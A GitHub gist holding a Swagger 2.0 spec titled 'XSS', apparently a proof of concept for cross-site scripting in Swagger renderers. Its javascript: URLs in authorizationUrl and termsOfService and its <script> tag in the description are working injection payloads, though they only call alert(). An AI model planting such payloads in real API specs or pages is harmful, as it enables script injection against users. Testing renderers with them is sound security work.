Skip to content

Instantly share code, notes, and snippets.

@unconfigured
Last active February 1, 2023 15:15
Show Gist options
  • Save unconfigured/f3e62a66aee91240b307453c5fe16d7d to your computer and use it in GitHub Desktop.
Save unconfigured/f3e62a66aee91240b307453c5fe16d7d to your computer and use it in GitHub Desktop.
swagger: '2.0'
securityDefinitions:
a:
type: oauth2
authorizationUrl: javascript:alert(3)//
info:
version: "0.0.1"
title: XSS
description: <script>alert(2)</script>
termsOfService: "javascript:alert(1)"
paths:
/:
get:
responses:
200:
description: Successful response
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment